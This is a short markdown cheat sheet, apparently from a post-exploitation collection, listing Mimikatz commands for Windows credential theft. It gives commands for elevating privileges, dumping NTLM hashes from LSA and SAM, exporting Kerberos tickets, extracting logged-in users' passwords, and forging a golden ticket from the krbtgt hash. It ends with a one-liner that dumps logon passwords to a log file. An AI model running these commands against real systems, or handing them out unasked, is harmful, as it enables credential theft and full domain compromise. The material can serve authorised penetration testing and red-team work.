killchain-compendium/Post Exploitation/Windows/Mimikatz.md

Mimikatz Usage

• Check your privilege, boy

privilege::debug
token::elevate

Dump hashes

• NTLM

$ lsadump::lsa /patch

sekurlsa::tickets /export

Dump Local Password hashes

token::elevate

lsadump::sam

• Form logged in users

sekurlsa::logonPasswords

Golden ticket

• Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi

$ lsadump::lsa /inject /name:krbtgt
$ kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behinde domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>

• use the golden ticket, open a new elevated prompt

misc::cmd

Oneliner

• Get the stuff

.\mimikatz "log host-42.log" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit